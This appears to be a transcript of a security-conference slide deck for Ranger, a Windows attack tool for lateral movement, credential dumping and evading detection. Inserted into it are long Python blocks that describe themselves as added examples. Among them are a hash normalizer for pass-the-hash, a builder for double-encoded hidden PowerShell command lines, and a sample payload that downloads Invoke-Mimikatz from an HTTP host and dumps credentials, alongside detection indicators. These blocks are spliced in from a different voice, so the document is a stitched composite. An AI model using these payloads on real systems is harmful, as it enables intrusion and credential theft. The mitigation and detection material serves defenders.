Ranger BSides-FINAL

Date post: 22-Jan-2018
Upload: christopher-duffy
Transcript
Page 1: Ranger BSides-FINAL

RANGER

IT JUST TAKES ONE ACCOUNT TO TAKE DOWN AN ENTERPRISE!

Page 2

WHO ARE WE?

• Chris “Funk and Wagnalls” Duffy

• Code Cobbler

• Dev “Leeroy” Patel

• Code Lobber

• Jonathan “Wushu” Fallone

• Code Janitor

Page 3

DISCLAIMER

• Ranger is provided only as a security tool for use during legal and authorized assessments

• Do not do anything illegal with Ranger; if you do, bad things will probably happen to you, and we are not involved

• We do not represent any organizations, including our current employer

• Our opinions are our own

Page 4

THANK YOU

• Microsoft for PowerShell (and in advance for bash in Windows!)

• To the CoreLabs Impacket Team

• PowerShellEmpire Team

• Mattifestation for starting PowerSploit, and PowerShellMafia and its contributors for continuing to develop it

• To our friends who told us where our tool sucked (constructive feedback is important!)

Page 5

THE OLD WAYS…AND THE ISSUES

• Lots of different command syntax to remember

• Special characters in the input (passwords, commands) would break the tools

• Bad hash formats would not be recognized

• Many different terminals make it hard to remember what is doing what

• Ctrl+C was not your friend (oops wrong terminal or killed my Framework instance)

• You could not pass commands through pipes cleanly

• Painful, and easy to detect, on large enterprise-class networks

• Very slow: it takes forever to assess all targets

Page 6

THERE MUST BE A BETTER WAY… AND NOW THERE IS!

Page 7

RANGER

A Windows Attack Tool That Automates Access and Exploitation of Targets Quickly and Stealthily – You only need credentials, Python, and sometimes PowerShell

* We did not make this image; we borrowed it from the CyberPunk website, which made it for this tool

Page 8

SO BACK IN JULY, 2015…

• We wanted a tool that could bypass the IDS/IPS being implemented in big organizations

• We wanted to determine gaps in monitoring coverage

• We knew the limitations in current methods and implementations

• We were tired of grep/sed/awk-ing everything and piping results, but we wanted to be able to if we wanted to (a la NO FRAMEWORKS!)

• We did not want Ctrl+C destroying our world when something went wrong

• We wanted to be able to pass information between sessions or multi-person assessment teams

• We wanted to be able to inject any script or binary into memory we wanted

• We wanted to be lazier, so we could focus on more fun and challenging tasks (dumping creds is not hard)

• We wanted to link it all together with native Python (because we hate, loathe, and mandate the destruction of gems and gem conflicts!)

Page 9

WHAT IS RANGER GOOD FOR?

• Hitting multiple systems very quickly with PowerShell tooling such as Invoke-Mimikatz

• Identifying where an account has access and who has a current session

• Executing custom code against a box without dropping a payload on the box

• Avoiding protective tools that key on White Listing, Process Monitoring, and Signature Detection Techniques

• Automatic logging of results

• Scalability for enormous networks

* Because Swiss Army Knives Suck

Vision: To be able to automate the tedious, high-error-rate tasks en masse

Page 10

RANGER USES “METHODS” TO DELIVER “ATTACKS,” PRIMARILY THROUGH A BUILT-IN HTTP “CATAPULT” SERVER, WHICH DELIVERS THE PAYLOADS

Page 11

METHODS

• A ton of custom code and modified Impacket tools

• WMIEXEC

• SMBEXEC

• PSEXEC

• ATEXEC

*BTW these methods have had more success than this guy

Page 12

ATTACKS

• SCOUT – determines where the account has access and identifies logged-in users whose credentials may be resident in memory and extractable (counts as both a Method and an Attack)

• Basic command shell (PSEXEC and SMBEXEC)

• Send arbitrary commands (e.g. net user) through WMIEXEC, PSEXEC, and ATEXEC

• INVOKER – execute a Mimikatz PowerShell script in memory (DumpCreds by default)

• DOWNLOADER – Download and execute a Metasploit Meterpreter via web_delivery (Yes, you need Metasploit for this Attack)

• EXECUTOR – use WMIEXEC or ATEXEC to execute any PowerShell Script or binary through PowerShell

• SECRETS-DUMP – dump the local hashes, or every hash held by a domain controller (counts as both a Method and an Attack)

• Create encoded PowerShell scripts that can be catapulted or copied and pasted into a prompt

Page 13

STEALTH

• Payloads are double encoded by default! (use --no-encode to stop that)

• Scout uses DCE/RPC, and detecting it requires correlating four different logs on specific timestamps

• Invoker, Downloader, and Executor use direct memory injection so nothing touches disk (the PowerShell itself is still visible to script block logging, covered under MITIGATIONS)

Page 14

AUTOMATION

• Can take a range or CIDR of addresses as input

• Can take a list of IP addresses in a file

• Can take Nmap XMLs as input

• Can do all at the same time

• Accepts comma-separated lists of each

• Aggregates results and eliminates duplicates

• Includes an allowance for exclusions, exclusions lists, and exclusion Nmap XMLs

• Automatically ignores your own IP address – why? Because it makes sense, it is 2016 for crying out loud (take that, Metasploit!)

• Accepts multiple hash formats, from PWDUMP to LM:NTLM, and broken hashes (yes, Ranger attempts to fix them)
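The target aggregation this slide lists (CIDR, dashed ranges, comma-separated mixes of both, Nmap XML, exclusions of each kind, dropping your own address, deduplication), worked through as an added Python example. This is not Ranger's own code: the function names, the `self_ip` parameter and the Nmap XML fragment are this example's own constructions.

```python
"""Target-list aggregation of the kind the AUTOMATION slide describes.

Added example, not Ranger's own code. Function and parameter names are
this example's own; the Nmap XML and addresses are constructed samples.
"""
import ipaddress
import xml.etree.ElementTree as ET


def expand_spec(spec):
    """Expand one target token into a set of IPv4 address strings.

    Accepts CIDR ('10.0.0.0/29'), a dashed range with a full or last-octet
    end ('10.0.0.20-10.0.0.22' or '10.0.0.20-22'), or a single address.
    """
    spec = spec.strip()
    if not spec:
        return set()
    if "/" in spec:
        net = ipaddress.ip_network(spec, strict=False)
        # /31 and /32 have no "usable hosts" in the classic sense; take them all.
        members = net.hosts() if net.num_addresses > 2 else net
        return {str(a) for a in members}
    if "-" in spec:
        start, end = (p.strip() for p in spec.split("-", 1))
        if "." not in end:  # last-octet shorthand: 10.0.0.20-22
            end = start.rsplit(".", 1)[0] + "." + end
        first, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
        if last < first:
            raise ValueError(f"range end before start: {spec}")
        return {str(ipaddress.ip_address(i)) for i in range(int(first), int(last) + 1)}
    return {str(ipaddress.ip_address(spec))}


def expand_list(text):
    """Comma-separated list of specs, any mix of CIDR / range / single address."""
    out = set()
    for token in text.split(","):
        out |= expand_spec(token)
    return out


def hosts_from_nmap_xml(xml_text, require_up=True):
    """Pull IPv4 addresses out of an Nmap XML report (hosts marked 'up' only by default)."""
    found = set()
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if require_up and status is not None and status.get("state") != "up":
            continue
        for addr in host.findall("address"):
            if addr.get("addrtype") == "ipv4":
                found.add(addr.get("addr"))
    return found


def build_target_set(includes, excludes="", include_xml=(), exclude_xml=(), self_ip=None):
    """Aggregate every input kind, subtract every exclusion kind, drop our own
    address, dedupe, and return a list sorted in address order."""
    targets = expand_list(includes)
    for xml_text in include_xml:
        targets |= hosts_from_nmap_xml(xml_text)
    drop = expand_list(excludes)
    for xml_text in exclude_xml:
        drop |= hosts_from_nmap_xml(xml_text, require_up=False)
    if self_ip:
        drop.add(str(ipaddress.ip_address(self_ip)))
    return sorted(targets - drop, key=lambda a: int(ipaddress.ip_address(a)))


# Constructed Nmap XML fragment: one live host already inside the CIDR, one
# new live host, and one that is down (ignored).
SAMPLE_NMAP_XML = """<nmaprun>
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="10.0.0.30" addrtype="ipv4"/>
        <address addr="AA:BB:CC:DD:EE:FF" addrtype="mac"/></host>
  <host><status state="down"/><address addr="10.0.0.31" addrtype="ipv4"/></host>
</nmaprun>"""


def demo():
    return build_target_set(
        includes="10.0.0.0/29, 10.0.0.20-22",
        excludes="10.0.0.3",
        include_xml=[SAMPLE_NMAP_XML],
        self_ip="10.0.0.20",  # the operator's own box, skipped automatically
    )


if __name__ == "__main__":
    for ip in demo():
        print(ip)
```

The sample run merges a /29, a last-octet range and an Nmap report, then removes the explicit exclusion and the operator's own address, leaving eight unique targets in address order.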

Page 15

OUTPUT

• Saves detailed logs for troubleshooting

• Stores results in multiple files and folders

• Aggregates the details across multiple sessions

• Has a master credential matrix file that acts as a flat database and can be transitioned between Ranger instances and/or sessions

• Automatically saves credentials obtained via Mimikatz, SECRETS-DUMP, and other tools

• You can purge all the details between clients if you want (ranger --purge)
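Hash-format normalization as the AUTOMATION slide describes it (PWDUMP lines, LM:NTLM pairs, broken hashes that Ranger tries to fix), producing the single LM:NT form a credential matrix like the one on this slide can store. Added Python example, not Ranger's own code: the repair rules (fill a missing or junk LM slot with the blank LM hash, lower-case the hex, reject an NT hash that is not 32 hex digits) and the sample lines are this example's assumptions.

```python
"""Normalising the hash inputs the AUTOMATION slide lists (PWDUMP lines,
LM:NTLM pairs, bare NT hashes and common 'broken' variants) into the one
LM:NT form a credential matrix can store. Added example, not Ranger's own
code; the repair rules are this example's assumptions about what 'fixing'
a hash should mean, and the sample lines are constructed.
"""
import re

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def _clean_hex(part):
    """Lower-case, strip whitespace and a leading 0x, drop pwdump's '*' padding."""
    part = part.strip().lower().replace("*", "")
    return part[2:] if part.startswith("0x") else part


def normalize_hash(raw):
    """Return (username_or_None, 'lm:nt').

    Accepted shapes:
      user:rid:LM:NT:::        pwdump / secretsdump
      LM:NT                    pair
      :NT  or  NT              missing LM -> blank LM filled in
    An NT part that is not 32 hex characters cannot be repaired and is rejected.
    """
    s = raw.strip().rstrip(":")
    if not s or s.startswith("#"):
        raise ValueError("empty or comment line")
    parts = s.split(":")
    user = None
    if len(parts) >= 4 and parts[1].strip().isdigit():  # pwdump: the RID is field 2
        user, lm, nt = parts[0].strip(), parts[2], parts[3]
    elif len(parts) == 2:
        lm, nt = parts
    elif len(parts) == 1:
        lm, nt = "", parts[0]
    else:
        raise ValueError(f"unrecognised hash layout: {raw!r}")
    lm, nt = _clean_hex(lm), _clean_hex(nt)
    if not HEX32.match(nt):
        raise ValueError(f"NT hash is not 32 hex chars: {raw!r}")
    if not HEX32.match(lm):
        # 'NO PASSWORD', empty, or junk in the LM slot: treat as no LM hash
        lm = BLANK_LM
    return user, f"{lm}:{nt}"


def normalize_many(lines):
    """Split a batch into (accepted, rejected) so one bad line never aborts the run."""
    accepted, rejected = [], []
    for line in lines:
        try:
            accepted.append(normalize_hash(line))
        except ValueError as exc:
            rejected.append((line, str(exc)))
    return accepted, rejected


# Constructed sample input: a clean pwdump line, an upper-cased bare NT hash,
# a pair with the LM slot empty, a pwdump line with 'NO PASSWORD' padding,
# and a truncated hash that cannot be repaired.
SAMPLE_LINES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "8846F7EAEE8FB117AD06BDD830B7586C",
    ":8846f7eaee8fb117ad06bdd830b7586c",
    "svc_backup:1105:NO PASSWORD*********************:8846f7eaee8fb117ad06bdd830b7586c:::",
    "8846f7eaee8fb117",
]


def demo():
    return normalize_many(SAMPLE_LINES)


if __name__ == "__main__":
    ok, bad = demo()
    for user, pair in ok:
        print(user or "<no user>", pair)
    for line, why in bad:
        print("REJECTED", line, "-", why)
```

Everything that reaches the matrix is then in one shape, so a later pass-the-hash method never has to guess whether it was handed a pwdump line or a bare NT hash; the truncated line is reported rather than silently turned into a credential that can never authenticate.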

Page 16

INSTALLATION

One easy setup file that creates the needed log folders, retrieves modified PowerTools and PowerSploit scripts, downloads and installs Impacket, and loads the Ranger Python script and necessary libraries (yes we are that lazy too!)

• Step 1: Download setup.sh script from GitHub

• Step 2: chmod the script so it can run (i.e. chmod a+x setup.sh)

• Step 3: Run setup.sh script

• Step 4: Relax and have a beer

• You can also update easily (ranger --update)

Page 17

MITIGATIONS

• Prevent lateral movement with local accounts

• Apply the “Deny access to this computer from the network” user right to local accounts and local administrators

• Implement Microsoft Local Administrator Password Solution (LAPS)

• Principle of least privilege – duh!

• Restrict Windows Management Instrumentation Command-line (WMIC)

• Restrict PowerShell with AppLocker

• Domain Admin accounts = Domain Controllers only

• Logs Logs Logs

• Centralize those event logs

• PowerShell 5.0 – Script block logging – Windows 7 / 2008 R2 +

• Trend analysis and PowerShell Remoting usage

• READ!!!!

• The two white papers by Microsoft for Pass-the-Hash Mitigation (YES we know it does not mitigate Pass-the-Hash, but it does show some good credential hygiene practices)

• Read the NSA White Paper on Detecting Pass-the-Hash (Read above bullet, same applies here)
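The encoded PowerShell payloads from the ATTACKS and STEALTH slides, and what the logging this slide recommends lets a defender do with them, in one added Python example. It is not Ranger's encoder and not a real detection product: the two-stage layout (an outer -EncodedCommand stub that base64-decodes and IEXes the inner script), the indicator list and the sample command line are this example's own constructions.

```python
"""Two sides of the encoded-PowerShell payloads on the ATTACKS and STEALTH
slides: building the (double-)encoded command line, and peeling one back
out of a process-creation log line. Added example, not Ranger's own encoder
or any detection product; staging layout, indicator list and sample command
line are this example's own constructions.
"""
import base64
import binascii
import re


def encode_command(script):
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    return base64.b64decode(b64).decode("utf-16-le")


def double_encode(script):
    """Inner stage: the real script, base64 over UTF-8, carried as a string
    literal. Outer stage: a stub that decodes and IEXes it, itself wrapped
    for -EncodedCommand. Nothing readable in the command line names the tool."""
    inner = base64.b64encode(script.encode("utf-8")).decode("ascii")
    stub = ("IEX([System.Text.Encoding]::UTF8.GetString("
            f"[System.Convert]::FromBase64String('{inner}')))")
    return encode_command(stub)


def build_command_line(script, double=True):
    enc = double_encode(script) if double else encode_command(script)
    return f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {enc}"


# --- defender side ---------------------------------------------------------

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = sorted(("encodedcommand"[:i] for i in range(1, 15)), key=len, reverse=True)
ENC_FLAG = re.compile(r"-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
INDICATORS = ("Invoke-Expression", "IEX", "FromBase64String", "DownloadString",
              "Net.WebClient", "Invoke-Mimikatz", "Reflection.Assembly")


def peel_stages(script, max_depth=4):
    """Follow FromBase64String('...') literals stage by stage. UTF-16LE text is
    recognised by its NUL bytes; anything else is read as UTF-8."""
    stages, frontier = [script], [script]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for m in B64_LITERAL.finditer(text):
                try:
                    raw = base64.b64decode(m.group(1), validate=True)
                except (binascii.Error, ValueError):
                    continue
                codec = "utf-16-le" if b"\x00" in raw else "utf-8"
                found.append(raw.decode(codec, errors="replace"))
        if not found:
            break
        stages.extend(found)
        frontier = found
    return stages


def analyze_command_line(cmdline):
    """Return {'encoded': bool, 'stages': [decoded text per stage], 'hits': [...]}."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return {"encoded": False, "stages": [], "hits": []}
    try:
        outer = decode_command(m.group(1))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return {"encoded": True, "stages": [], "hits": ["undecodable -EncodedCommand"]}
    stages = peel_stages(outer)
    hits = [ind for ind in INDICATORS
            if any(re.search(r"\b" + re.escape(ind) + r"\b", st, re.I) for st in stages)]
    return {"encoded": True, "stages": stages, "hits": hits}


# Constructed payload: fetch a Mimikatz PowerShell script from a catapult-style
# HTTP server and run it in memory.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'http://10.0.0.99:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds")


def demo():
    cmdline = build_command_line(SAMPLE_SCRIPT)  # what 4688 / Sysmon event 1 would record
    return cmdline, analyze_command_line(cmdline)


if __name__ == "__main__":
    cmdline, report = demo()
    print(cmdline[:80] + "...")
    for i, stage in enumerate(report["stages"]):
        print(f"stage {i}: {stage[:100]}")
    print("indicators:", ", ".join(report["hits"]))
```

The peeling step is what process-creation records need (4688 with command-line auditing, Sysmon event 1), because only the encoded string is captured there; PowerShell 5 script block logging (event 4104) already records each decoded stage as it executes, so against that log the indicators can be matched directly, which is why this slide pushes it.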

Page 18

THE FUTURE

• WINDOWER – Execute PowerShell without hiding the window to avoid certain monitoring systems…and take advantage of human gullibility

• GATHERER – Automated credential extractor for a domain group

• HUNTER - Semi-Intelligent Decision (SID) – Identifies an escalation path based on group membership similarities to go from standard access to a target group, by building a decision tree (technically a classification tree)

• Better NTDS and Group Parsing for all those Windows OSs that are all the same

• SMB Catapult servers

• Are we currently coding these? YES! And we are hoping for another Security Conference to accept our CFP to show the new features!

Page 19

DEMO TIME! BRING THE PWNAGE!

Page 20

CHEERS TO YOU…

